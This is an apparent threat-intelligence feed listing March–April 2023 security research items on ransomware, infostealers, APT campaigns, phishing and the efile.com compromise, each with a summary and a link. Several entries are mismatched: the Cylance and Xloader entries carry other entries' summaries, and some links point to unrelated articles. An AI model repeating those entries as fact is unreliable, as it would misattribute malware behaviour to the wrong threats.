Date of Scan:: 2023-04-06

Impact:: LOW

Summary:: Johannes B. Ullrich, Ph.D. , Dean of Research from SANS.edu analyzed the efile.com Malware "efail" which serving malicious ake "Browser Updates" to some of its users. Johannes B. Ulrich could retrieve some of the malware last evening before it was removed. The attack uses two main executables. The first one, "update.exe," is a simple downloader downloading and executing the second part. The second part is a PHP script communicating with the command and control server. Its main function is to download and execute additional code as instructed to do so. During the installation, basic system information is sent to the attacker, and the backdoor is made persistent via scheduled/on-boot registry entries.

Source: https://isc.sans.edu/diary/Analyzing+the+efilecom+Malware+efail/29712/#comments

Intel Source:: Trellix

Intel Name:: Royal_Ransom_analyses

Date of Scan:: 2023-04-06

Impact:: LOW

Summary:: Trellix Advanced Cyber Services team within Trellix Professional Services provided updated incident response-related data.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html

Intel Source:: Talos

Intel Name:: Typhon_Reborn_Stealer_Malware_Back_with_Advanced_Evasion_Techniques

Date of Scan:: 2023-04-05

Impact:: LOW

Summary:: Talos researchers have observed that the threat actor behind the information-stealing malware known as Typhon Reborn has resurfaced with an updated version (V2) that packs in improved capabilities to evade detection and resist analysis.

Source: https://blog.talosintelligence.com/typhon-reborn-v2-features-enhanced-anti-analysis/

Intel Source:: Sysdig

Intel Name:: Proxyjacking_Scheme_Exploits_Log4j_Bug_to_Profit_From_Victim_IP_Addresses

Date of Scan:: 2023-04-05

Impact:: LOW

Summary:: Researchers from Sysdig have detected a new attack, dubbed proxyjacking, that leveraged the Log4j vulnerability for initial access. The attacker then sold the victim’s IP addresses to proxyware services for profit.

Source: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/

Intel Source:: Cyber War Zone

Intel Name:: Disney_Phishing_Scams

Date of Scan:: 2023-04-05

Impact:: LOW

Summary:: Researchers from Cyber War Zone have identified the latest Disney-related phishing scams in 2023 and provide tips to protect from falling victim to these scams.

Source: https://cyberwarzone.com/beware-of-disney-phishing-scams-in-2023/?web_view=true

Intel Source:: Fortinet

Intel Name:: New_Ransomware_Variants_Are_Dark_Power_and_PayME100USD

Date of Scan:: 2023-04-05

Impact:: LOW

Summary:: FortiGate Labs researchers have identified two new ransomware named Dark Power and PayME100USD. Dark Power ransomware launched in early February 2023 and this is a rare ransomware breed in that it was written in the Nim programming language. PayMe100USD ransomware written in Python that was discovered in March 2023 and the malware has basic functionality and performs ordinary ransomware activities.

Source: https://www.fortinet.com/blog/threat-research/dark-power-and-payme100usd-ransomware?&web_view=true

Intel Source:: Symantec

Intel Name:: An_Attack_Against_Palestinian_Targets_Using_New_Weapons

Date of Scan:: 2023-04-05

Impact:: LOW

Summary:: Researchers from Symantec have observed that the Mantis APT group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be operating out of the Palestinian territories, is continuing to mount attacks, deploying a refreshed toolset and going to great lengths to maintain a persistent presence on targeted networks.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks

Intel Source:: Mandiant

Intel Name:: Chinese_Hacking_Group_RedGolf_Targeting_Windows_and_Linux_Systems

Date of Scan:: 2023-04-05

Impact:: MEDIUM

Summary:: Mandiant researchers have identified a Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.

Source: https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation

Intel Source:: Checkpoint

Intel Name:: New_Ransomware_Rorschach_Targeting_US_Based_Company

Date of Scan:: 2023-04-05

Impact:: MEDIUM

Summary:: Checkpoint researchers have analyzed the Rorschach ransomware and revealed the emergence of a new ransomware strain in the crimeware landscape. Its developers implemented new anti-analysis and defense evasion techniques to avoid detection and make it more difficult for security software and researchers to analyze and mitigate its effects.

Source: https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/

Intel Source:: Symantec

Intel Name:: Arid_Viper_Hacking_Group_Using_Upgraded_Malware

Date of Scan:: 2023-04-05

Impact:: LOW

Summary:: Researchers from Symantec have discovered the threat actor known as Arid Viper has been observed using refreshed variants of its malware toolkit in its attacks targeting Palestinian entities since September 2022.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord

Intel Source:: Mandiant

Intel Name:: ALPHV_Ransomware_Affiliate_Targeting_Vulnerable_Backup_Installations_to_Gain_Initial_Access

Date of Scan:: 2023-04-05

Impact:: MEDIUM

Summary:: Mandiant researchers have observed a new ALPHV (aka BlackCat ransomware) ransomware affiliate, tracked as UNC4466, targeting publicly exposed Veritas Backup Exec installations, vulnerable to CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878, for initial access to victim environments.

Source: https://www.mandiant.com/resources/blog/alphv-ransomware-backup

Intel Source:: Cyfirma

Intel Name:: New_European_APT_Group_Named_FusionCore

Date of Scan:: 2023-04-04

Impact:: LOW

Summary:: Cyfirma researchers have identified a new European threat actor group known as FusionCore that is running Malware-as-a-service, along with the hacker-for-hire operation, they have a wide variety of tools and services that offered on their website, making it a one-stop-shop for threat actors looking to purchase cost-effective yet customizable malware.

Source: https://www.cyfirma.com/outofband/the-rise-of-fusioncore-an-emerging-cybercrime-group-from-europe/

Intel Source:: Checkpoint

Intel Name:: Analyzing_Rhadamanthys_infostealer

Date of Scan:: 2023-04-04

Impact:: LOW

Summary:: Checkpoint reserachers provided the highlights of the Dark Web ‘buzz’ surrounding this malware. They shared insights which confirm that by the nature of how the malware is used, large orgs are also being subjected to incidental drive-by attacks that have a theoretical potential to escalate. Rhadamanthys is an advanced infostealer which debuted on the dark web in September of last year to a warm critical reception by cybercriminals.

Source: https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/

Intel Source:: ASEC

Intel Name:: The_distribution_of_Nevada_Ransomware_in_Korea

Date of Scan:: 2023-04-04

Impact:: LOW

Summary:: ASEC have identified new cases of the Nevada ransomware while they did some internal monotoring. Nevada is a malware that adds the “.NEVADA” extension to the files it infects is its defining trait. After encrypting directories, it creates ransom notes with the filename “README.txt” in every directory. These notes contain a Tor browser link for ransom payments.

Source: https://asec.ahnlab.com/en/50063/

Intel Source:: MalwareHunter, ISC.SANS

Intel Name:: IRS_Authorized_Tax_Return_Filing_Software_Caught_Serving_JS_Malware

Date of Scan:: 2023-04-04

Impact:: LOW

Summary:: Researchers from MalwareHunter have observed the malicious JavaScript file that existed on eFile[.]com website for weeks. It is an IRS-authorized e-file software service provider used by many for filing their tax returns and has been caught serving JavaScript malware.

Source: https://twitter.com/malwrhunterteam/status/1642988428080865281 https://isc.sans.edu/diary/Supply+Chain+Compromise+or+False+Positive+The+Intriguing+Case+of+efilecom+updated+confirmed+malicious+code/29708/

Intel Source:: Cyble

Intel Name:: The_Malware_Sample_Analysis_of_Cl0p_Ransomware

Date of Scan:: 2023-04-04

Impact:: LOW

Summary:: Cyble researchers have analyzed malware samples as an executable file with a Graphical User Interface (GUI), compiled using Microsoft Visual C/C++.

Source: https://blog.cyble.com/2023/04/03/cl0p-ransomware-active-threat-plaguing-businesses-worldwide/

Intel Source:: Sucuri

Intel Name:: Vulnerability_in_WordPress_Elementor_Pro_Patched

Date of Scan:: 2023-04-04

Impact:: LOW

Summary:: Researchers from Sucuri have analyzed the WordPress Elementor Pro vulnerability that allows authenticated users to arbitrarily change wp_options values within the database via the AJAX action of Elementor Pro working in conjunction with WooCommerce.

Source: https://blog.sucuri.net/2023/03/high-severity-vulnerability-in-wordpress-elementor-pro-patched.html

Intel Source:: CERT-UA

Intel Name:: ICS_compromised_Due_to_Installition_of_Unlicensed_Microsoft_Office

Date of Scan:: 2023-04-03

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified unauthorized access to the information and communication system (ICS) of one of the utility companies. It is observed that the primary compromise of the computer took place on 19.01.2023 as a result of the installation of an unlicensed version of the software product Microsoft Office 2019.

Source: https://cert.gov.ua/article/4279195

Intel Source:: ZScaler

Intel Name:: Money_Message_Ransomware_Targeting_Worldwide

Date of Scan:: 2023-04-03

Impact:: LOW

Summary:: Researchers from Zscaler have identified a new ransomware gang named 'Money Message' has appeared, targeting victims worldwide and demanding million-dollar ransoms not to leak data and release a decryptor.

Source: https://twitter.com/Threatlabz/status/1641113991824158720

Intel Source:: DFIR Report

Intel Name:: MalSpam_Delivering_Malicious_ISO

Date of Scan:: 2023-04-03

Impact:: LOW

Summary:: The DFIR report researchers have observed that IcedID continues to deliver malspam emails to facilitate a compromise, and covers the activity from a campaign in late September of 2022. Post-exploitation activities detail some familiar and some new techniques and tooling, which led to domain-wide ransomware.

Source: https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/

Intel Source:: Fortinet

Intel Name:: New_Cylance_Ransomware_Targeting_Linux_and_Windows

Date of Scan:: 2023-04-03

Impact:: LOW

Summary:: FortiGate Labs researchers have identified two new ransomware named Dark Power and PayME100USD. Dark Power ransomware launched in early February 2023 and this is a rare ransomware breed in that it was written in the Nim programming language. PayMe100USD ransomware written in Python that was discovered in March 2023 and the malware has basic functionality and performs ordinary ransomware activities.

Source: https://www.fortinet.com/blog/threat-research/dark-power-and-payme100usd-ransomware?&web_view=true

Intel Source:: PaloAlto

Intel Name:: New_Variant_of_Xloader_Malware

Date of Scan:: 2023-04-03

Impact:: MEDIUM

Summary:: Researchers from PaloAlto have discovered a new ransomware named Cylance Ransomware which is targeting Windows and Linux systems.

Source: https://twitter.com/Unit42_Intel/status/1641588431221342208

Intel Source:: ASEC

Intel Name:: Emotet_Distributing_via_OneNote

Date of Scan:: 2023-04-01

Impact:: LOW

Summary:: Researchers from ASEC have discovered the distribution of Emotet being distributed via OneNote. A spear-phishing email as below attached with a OneNote file prompts the reader to open the attachment which contains a malicious script file (JS file).

Source: https://asec.ahnlab.com/en/50564/

Intel Source:: ASEC

Intel Name:: Analyzing_CHM_Malware_Using_EDR

Date of Scan:: 2023-04-01

Impact:: LOW

Summary:: ASEC researchers have identified an APT attack case that has recently used CHM (Compiled HTML Help File). Threat actors are able to input malicious script codes in HTMLs with the inclusion of CHM and the inserted script is executing through hh.exe which is a default OS application.

Source: https://asec.ahnlab.com/en/50580/

Intel Source:: ASEC

Intel Name:: New_Infostealer_LummaC2_Distributing_Under_the_Mask_of_Illegal_Cracks

Date of Scan:: 2023-04-01

Impact:: LOW

Summary:: ASEC researchers have identified a new Infostealer called LummaC2 that is distributing disguised as illegal programs such as cracks and keygens.

Source: https://asec.ahnlab.com/en/50594/

Intel Source:: Quickheal

Intel Name:: The_Deep_Examination_of_Royal_Ransomware

Date of Scan:: 2023-04-01

Impact:: LOW

Summary:: QuickHeal researchers have deeply analyzed the Royal Ransomware. It was first observed in mid-2022 and it is a type of ransomware that encrypts all volumes including network shared drives.

Source: https://blogs.quickheal.com/deep-dive-into-royal-ransomware/

Intel Source:: Splunk

Intel Name:: The_Detection_and_Defense_Technique_of_AsyncRAT

Date of Scan:: 2023-04-01

Impact:: LOW

Summary:: Splunk researchers have analyzed the AsyncRAT and provided the detection and defense technique. It is a popular malware commodity and tool and threat actors and adversaries use several interesting script loaders and spear phishing attachments to deliver AsyncRAT to targeted hosts or networks in different campaigns.

Source: https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html

Intel Source:: TrendMicro

Intel Name:: New_OpcJacker_Malware_Distributing_via_Fake_VPN_Malvertising

Date of Scan:: 2023-04-01

Impact:: LOW

Summary:: TrendMicro researchers have discovered a new malware, which we named OpcJacker that is distributing in the wild since the second half of 2022. Its main functions include keylogging, taking screenshots, stealing sensitive data from browsers, loading additional modules, and replacing cryptocurrency addresses in the clipboard for hijacking purposes.

Source: https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html

Intel Source:: Securonix Threat Labs

Intel Name:: New_TACTICAL_OCTOPUS_Attack_Campaign_Targeting_US_Entities

Date of Scan:: 2023-03-31

Impact:: MEDIUM

Summary:: Securonix Threat Labs researchers have observed that threat actors are ramping up tax-related phishing scams to US-based victims to infect systems with stealthy malware.

Source: https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/

Intel Source:: Security Intelligence

Intel Name:: Defensive_Considerations_for_Lazarus_FudModule

Date of Scan:: 2023-03-31

Impact:: LOW

Summary:: Security Intelligence analysts posted in their blog a focus on highlighting the capabilities for detection of the FudModule within the Lazarus sample analyzed by X-Force, as well as summary of a strategy of using telemetry stream health as a mode of detecting malware designed to impair defenses through ETW tampering.

Source: https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/?c=Threat%20Research

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Email_sample_analyses_Mar_4th_to_11th_2023

Date of Scan:: 2023-03-31

Impact:: LOW

Summary:: ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 5th, 2023 to March 11th, 2023 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/49839/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_statistics_March_13_19th_2023

Date of Scan:: 2023-03-31

Impact:: LOW

Summary:: ASEC analysis team used the ASEC automatic analysis system RAPIT to categorize and respond to known malware. Their post covers weekly statistics collected from March 13th, 2023 to March 19th, 2023.

Source: https://asec.ahnlab.com/en/50173/

Intel Source:: Fortinet

Intel Name:: Hackers_Spreading_ShellBot_and_Moobot_Malware_on_Exploitable_Servers

Date of Scan:: 2023-03-31

Impact:: MEDIUM

Summary:: Researchers from FortiGuard Labs have observed several attacking bursts targeting Cacti and Realtek vulnerabilities in January and March of this year and then spreading ShellBot and Moobot malware.

Source: https://www.fortinet.com/blog/threat-research/moobot-strikes-again-targeting-cacti-and-realtek-vulnerabilities?&web_view=true

Intel Source:: Proofpoint

Intel Name:: New_APT_Group_TA473_Exploiting_Zimbra_Vulnerability

Date of Scan:: 2023-03-31

Impact:: MEDIUM

Summary:: Researchers from Proofpoint have observed a newly minted advanced persistent threat actor named TA473, exploiting Zimbra vulnerability CVE-2022-27926 to abuse publicly facing Zimbra hosted webmail portals. The goal of this activity is assessed to be gaining access to the emails of military, government, and diplomatic organizations across Europe involved in the Russia-Ukrainian War.

Source: https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability

Intel Source:: ASEC

Intel Name:: The_distribution_of_a_OneNote_malware_by_Kimsuky

Date of Scan:: 2023-03-30

Impact:: LOW

Summary:: ASEC has observed the distribution of a OneNote malware mimicking as a form rlinked to compensation. The confirmed file is pretending the same research center as the LNK-type malware mentioned earlier. Based on the identical malicious activity performed by the VBS files, the team came to a conclusion that the same actor the Kimsuky group is behind both incidents.

Source: https://asec.ahnlab.com/en/50303/

Intel Source:: Sentinelone

Intel Name:: AlienFox_Toolkit_Stealing_Cloud_Service_Credentials

Date of Scan:: 2023-03-30

Impact:: HIGH

Summary:: SentinelOne researchers have identified a new modular toolkit called AlienFox which allows threat actors to scan for misconfigured servers to steal authentication secrets and credentials for cloud-based email services.

Source: https://assets.sentinelone.com/sentinellabs22/s1_-sentinellabs_dis#page=1

Intel Source:: Sentinelone

Intel Name:: Supply_Chain_Attack_on_3CX_Desktop_Apps_Threatens_Millions_at_Risk

Date of Scan:: 2023-03-30

Impact:: MEDIUM

Summary:: Researchers from SentinelOne have identified the trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage info stealer DLL.

Source: https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/

Intel Source:: ASEC

Intel Name:: ChinaZ_DDoS_Bot_malware_distribution

Date of Scan:: 2023-03-30

Impact:: MEDIUM

Summary:: ASEC has observed the ChinaZ DDoS Bot malware that installed on Linux SSH servers. The ChinaZ group that was discovered in 2014 installs various DDoS bots on Windows and Linux systems. Major DDoS bots suspected that it was created by the ChinaZ threat group include XorDDoS, AESDDos, BillGates, and MrBlack.

Source: https://asec.ahnlab.com/en/50316/

Intel Source:: ASEC

Intel Name:: ShellBot_Malware_distribution

Date of Scan:: 2023-03-30

Impact:: MEDIUM

Summary:: ASEC researchers has recently observed the ShellBot malware being installed on Linux SSH servers. ShellBot, aka PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server. ShellBot is an old malware that has been in steady use and is still being used today to launch attacks against Linux systems.

Source: https://asec.ahnlab.com/en/49769/comment-page-2/#comments

Intel Source:: Medium

Intel Name:: New_Threats_Delivering_Through_NullMixer_Malware

Date of Scan:: 2023-03-29

Impact:: LOW

Summary:: Researchers from Medium have identified that the NullMixer malware operation revealed Italy and France are the favorite European countries from the opportunistic attackers’ perspective. They obtained information and data regarding an ongoing malware operation hitting more than 8.000 targets within a few weeks, with a particular emphasis on North American, Italian, and French targets.

Source: https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

Intel Source:: BitSight

Intel Name:: Tofsee_Botnet_Engaging_With_Proxying_and_Mining

Date of Scan:: 2023-03-29

Impact:: LOW

Summary:: Researchers from BitSight have observed a 15-year-old modular spambot called Tofsee being distributed by PrivateLoader (ruzki), a notorious malware distribution service.

Source: https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining

Intel Source:: ASEC

Intel Name:: Kimsuky_Group_Leveraging_Alternate_Data_Stream_to_Hide_Malware

Date of Scan:: 2023-03-29

Impact:: LOW

Summary:: Researchers from ASEC have discovered that the Kimsuky group is using Alternate Data Stream (ADS) to hide their malware. This malware is an Infostealer that collects data by starting the VBScript included inside an HTML file. It can be characterized by its tendency to add the actual code between numerous dummy codes.

Source: https://asec.ahnlab.com/en/50625/

Intel Source:: Exatrack

Intel Name:: New_Linux_Malware_Linked_With_Chinese_APT_Groups

Date of Scan:: 2023-03-29

Impact:: MEDIUM

Summary:: Exatrack researchers have discovered unknown Chinese state-sponsored hacking group has been linked to a novel piece of malware aimed at Linux servers dubbed Mélofée.

Source: https://blog.exatrack.com/melofee/

Intel Source:: Mandiant

Intel Name:: A_Deep_Dive_into_APT43

Date of Scan:: 2023-03-29

Impact:: MEDIUM

Summary:: Mandiant researchers have assessed with high confidence that APT43 is a moderately-sophisticated cyber operator that supports the interests of the North Korean regime. Campaigns attributed to APT43 include strategic intelligence collection aligned with Pyongyang’s geopolitical interests, credential harvesting, and social engineering to support espionage activities, and financially-motivated cybercrime to fund operations.

Source: https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

Intel Source:: Intezer

Intel Name:: Hackers_From_Biter_Group_Targeting_Chinese_Nuclear_Energy_Industry

Date of Scan:: 2023-03-29

Impact:: LOW

Summary:: Researchers from Intezer have observed a cyberespionage hacking group tracked as 'Bitter APT' is recently seen targeting the Chinese nuclear energy industry using phishing emails to infect devices with malware downloaders.

Source: https://www.intezer.com/blog/research/phishing-campaign-targets-nuclear-energy-industry/

Intel Source:: Microsoft

Intel Name:: The_Investigation_of_CVE_2023_23397

Date of Scan:: 2023-03-28

Impact:: HIGH

Summary:: Microsoft researchers have provided guidance on where organizations can take to assess whether users have been targeted or compromised by threat actors exploiting CVE-2023-23397. A successful exploit of this vulnerability can result in unauthorized access to an organization’s environment by triggering a Net-NTLMv2 hash leak.

Source: https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/

Intel Source:: Cyble

Intel Name:: A_new_Malware_as_a_Service_platform_Cinoshi

Date of Scan:: 2023-03-28

Impact:: LOW

Summary:: Cyble Researchers discovered a new Malware-as-a-Service (MaaS) platform “Cinoshi”. Cinoshi’s storehouse has of a stealer, botnet, clipper, and cryptominer. And now this MaaS platform is offering stealer and web panel for free, and such free services are rarely seen. The accesibility of this free malware services indicates that attackers no longer need technical expertise or resources to launch cyber-attacks.

Source: https://blog.cyble.com/2023/03/23/cinoshi-project-and-the-dark-side-of-free-maas/

Intel Source:: TrendMicro

Intel Name:: Earth_Preta_Cyberespionage_Campaign_Hits_Over_200

Date of Scan:: 2023-03-28

Impact:: LOW

Summary:: TrendMicro researchers have analyzed the active campaign delved into the structure, goals, and requirements of the organizations involved, and provided an opportunity to conduct wider intelligence analysis and insights in the development of effective countermeasures.

Source: https://www.trendmicro.com/en_us/research/23/c/earth-preta-cyberespionage-campaign-hits-over-200.html

Intel Source:: Malwarebytes

Intel Name:: The_Hunter_obfuscator_used_by_Magecart_skimmer

Date of Scan:: 2023-03-28

Impact:: LOW

Summary:: Malwarebytes reserachers discovered and analyzed a Magecart skimmer that uses Hunter, a PHP Javascript obfuscator. During their investigation, they observed a number of domains all part of the same infrastructure with custom skimmers for several Magento stores.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/03/hunter-skimmer

Intel Source:: AT&T

Intel Name:: BlackGuard_stealer_new_variant

Date of Scan:: 2023-03-28

Impact:: LOW

Summary:: AT&T Alien Labs researchers have observed a new variant of BlackGuard stealer in the wild, infecting using spear phishing attacks. BlackGuard steals user sensitive information from a wide range of applications and browsers, can hijack crypto wallets copied to clipboard and also try to propagate through removable media and shared devices.

Source: https://cybersecurity.att.com/blogs/labs-research/blackguard-stealer-extends-its-capabilities-in-new-variant

Intel Source:: ZScaler

Intel Name:: DBatLoader_Targeting_European_Businesses_via_Phishing_Email

Date of Scan:: 2023-03-28

Impact:: LOW

Summary:: Researchers from Zscaler have identified a new campaign involving DBatLoader also known as ModiLoader that specifically targets manufacturing companies and various businesses in European countries via phishing emails.

Source: https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses

Intel Source:: Proofpoint

Intel Name:: New_Era_of_IcedID

Date of Scan:: 2023-03-27

Impact:: MEDIUM

Summary:: Proofpoint researchers have observed three new distinct variants of the malware known as IcedID. Proofpoint called these ew variants as “Forked” and “Lite” IcedID , Standard IcedID Variant. IcedID is a malware originally classified as a banking malware and was first observed in 2017. It also performs as a loader for other malware, including ransomware. There are several key differences between initial and new ones. One key difference is the removal of banking functionality such as web injects and backconnect. Proofpoint researchers suspect the original operators behind Emotet are using an IcedID variant with different functionality.

Source: https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid?utm_source=social_organic&utm_social_network=twitter&utm_campaign=threat_research&utm_post_id=f0afcf84-fcda-487f-9e48-d05eabdbf03d

Intel Source:: Trellix

Intel Name:: A_new_ransomware_named_Dark_Power

Date of Scan:: 2023-03-27

Impact:: MEDIUM

Summary:: Researchers from Trellix have identified a new ransomware operation named 'Dark Power' that has appeared, and it has already listed its first victims on a dark web data leak site, threatening to publish the data if a ransom is not paid.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/shining-light-on-dark-power.html

Intel Source:: Uptycs

Intel Name:: New_macOS_based_Stealer_MacStealer_Malware

Date of Scan:: 2023-03-27

Impact:: LOW

Summary:: The Uptycs threat research team has observed aother macOS stealer "MacStealer". The threat actor who is distributing MacStealer was discovered by the Uptycs threat intelligence team during their dark web hunting. The stealer can extract documents, cookies from a victim's browser, and login information. It affects Catalina and subsequent macOS versions riding on Intel M1 and M2 CPUs.

Source: https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware

Intel Source:: Sentinelone

Intel Name:: MacOS_Malware_Targeting_Data_Assets

Date of Scan:: 2023-03-27

Impact:: LOW

Summary:: SentinelOne researchers have observed that the data assets targeted by macOS malware in some of the most recent in-the-wild incidents in order to help defenders better protect the enterprise and hunt for signs of compromise.

Source: https://www.sentinelone.com/blog/session-cookies-keychains-ssh-keys-and-more-7-kinds-of-data-malware-steals-from-macos-users/

Intel Source:: TrendMicro

Intel Name:: Earth_Preta_Changing_its_TTPs_to_Bypass_Security_Solutions

Date of Scan:: 2023-03-25

Impact:: LOW

Summary:: TrendMicro researchers have discovered Earth Preta delivering lure archives via spear-phishing emails and Google Drive links. After months of investigation, they identified that several undisclosed malware and interesting tools used for exfiltration purposes were used in this campaign.

Source: https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html

Intel Source:: Inquest

Intel Name:: Exploring_New_Public_Cloud_File_Borne_Phishing_Attack

Date of Scan:: 2023-03-25

Impact:: LOW

Summary:: Researchers from InQuest Labs have analyzed a credential phishing attack discovered by a municipal government organization. The email arrived from a compromised sender account address. The sender organization in the observed samples is the municipality's county health agency.

Source: https://inquest.net/blog/2023/03/22/credential-caution-exploring-new-public-cloud-file-borne-phishing-attack

Intel Source:: ASEC

Intel Name:: Microsoft_Office_Outlook_Privilege_Escalation_Vulnerability

Date of Scan:: 2023-03-25

Impact:: HIGH

Summary:: Researchers from ASEC have analyzed the Microsoft vulnerability in Outlook for Windows that is being exploited to steal NTLM credentials.

Source: https://asec.ahnlab.com/en/50218/

Intel Source:: ASEC

Intel Name:: MDS_Evasion_Feature_of_Anti_Sandboxes_That_Use_Pop_up_Windows

Date of Scan:: 2023-03-25

Impact:: LOW

Summary:: ASEC researchers have monitored various anti-sandbox tactics to evade sandboxes. The persistent anti-sandbox technique exploits the button form of the malicious IcedID Word files and the evasion feature of AhnLab’s MDS which is meant for detecting malicious behavior.

Source: https://asec.ahnlab.com/en/50198/

Intel Source:: Sentinelone

Intel Name:: Chinese_Hackers_Targeting_Middle_East_Telecom_Providers

Date of Scan:: 2023-03-25

Impact:: LOW

Summary:: SentinelLabs researchers have observed the use of a well-maintained, versioned credential theft capability and a new dropper mechanism indicative of an ongoing development effort by a highly-motivated threat actor with specific tasking requirements.

Source: https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/

Intel Source:: Mandiant

Intel Name:: Diving_Deep_into_UNC961

Date of Scan:: 2023-03-24

Impact:: LOW

Summary:: Researchers from Mandiant have analyzed the details and timeline of each intrusion conducted by UNC961, along with detection opportunities and examples of how Managed Defense’s proactive threat hunting, investigation, and response routinely limits the impact on our customers’ business and prevents their reality from being desecrated.

Source: https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated

Intel Source:: Intel471

Intel Name:: AresLoader_Linked_With_Russian_APT_Group

Date of Scan:: 2023-03-24

Impact:: LOW

Summary:: Intel471 researchers have observed a new loader malware-as-a-service (MaaS) named AresLoader offered by threat actors with links to Russian hacktivism that is spotted recently in the wild.

Source: https://intel471.com/blog/new-loader-on-the-bloc-aresloader

Intel Source:: Malwarebytes

Intel Name:: New_Kritec_Magecart_Skimmer_Targeting_Magento_Stores

Date of Scan:: 2023-03-24

Impact:: LOW

Summary:: Malwarebytes researchers have identified instances of compromised stores having both skimmers loaded, which means double trouble for victims as their credit card information is stolen not just once but twice.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/03/new-kritec-skimmer

Intel Source:: CISA

Intel Name:: A_Detailed_Examination_of_LockBit_From_CISA_and_MS_ISAC

Date of Scan:: 2023-03-23

Impact:: MEDIUM

Summary:: Researchers from CISA and MS-ISAC have warned against the LockBit ransomware. This may involve developing a comprehensive restoration plan, employing robust passwords for all accounts, integrating anti-phishing measures, updating software and system versions, and segregating network components, among others.

Source: https://www.cisa.gov/sites/default/files/2023-03/aa23-075a-stop-ransomware-lockbit.pdf

Intel Source:: Unit42

Intel Name:: The_Analysis_of_Hidden_Threats

Date of Scan:: 2023-03-23

Impact:: LOW

Summary:: Researchers from PaloAlto have discussed two important ways they have been able to tailor the analysis environment. Threats are continually evolving, and architecting analysis systems as more of a flexible, nicely abstracted software development kit instead of a stand-alone monolithic application is crucial.

Source: https://unit42.paloaltonetworks.com/tailoring-sandbox-techniques/

Intel Source:: Cyfirma

Intel Name:: The_New_Ransomware_Named_ALC_Ransomware

Date of Scan:: 2023-03-23

Impact:: LOW

Summary:: CYFIRMA researchers have identified a new strain of malware, named ALC Ransomware, which masquerades as ransomware but is scareware. This malware does not encrypt files on the victim’s machine, but instead disables the task manager, locks the screen, and displays a ransom note.

Source: https://www.cyfirma.com/outofband/alc-scareware-pretends-to-be-a-ransomware/

Intel Source:: Cyble

Intel Name:: SideCopy_APT_group_targets_India_goverment_organization

Date of Scan:: 2023-03-23

Impact:: LOW

Summary:: Recently, Cyble researchers discovered a Twitter post of an ongoing campaign by SideCopy APT against the “Defence Research and Development Organisation” of the Indian government. DRDO is a government agency tasked with researching and developing advanced technologies for use by the Indian Armed Forces.

Source: https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/

Intel Source:: Unit 42

Intel Name:: An_Emerging_Ransomware_Strain_Named_Trigona_Ransomware

Date of Scan:: 2023-03-23

Impact:: LOW

Summary:: PaloAlto researchers have identified two new Trigona ransom notes in January 2023 and two in February 2023. Trigona’s ransom notes are unique; rather than the usual text file, they are instead presented in an HTML Application with embedded JavaScript containing unique computer IDs (CID) and victim IDs (VID).

Source: https://unit42.paloaltonetworks.com/trigona-ransomware-update/

Intel Source:: Cyble

Intel Name:: Emotet_Malware_Spreading_via_OneNote_Attachments_to_Deliver_Payloads

Date of Scan:: 2023-03-23

Impact:: LOW

Summary:: Cyble researchers have closely monitored the Emotet campaign and identified that is again spreading malicious emails and infecting devices globally by rebuilding its network.

Source: https://blog.cyble.com/2023/03/17/recent-emotet-spam-campaign-utilizing-new-tactics/

Intel Source:: ZScaler

Intel Name:: The_Examination_of_the_Attack_Vectors_of_APT37

Date of Scan:: 2023-03-22

Impact:: LOW

Summary:: Researchers from Zscaler have analyzed the APT37 and found it is a threat actor heavily focused on targeting entities in South Korea. It is constantly updating its tactics, techniques, and procedures as is evident from the multiple file types used in the initial stages by it. The themes used by this threat actor range from geopolitics, current events, and education to finance and insurance.

Source: https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

Intel Source:: Rapid7

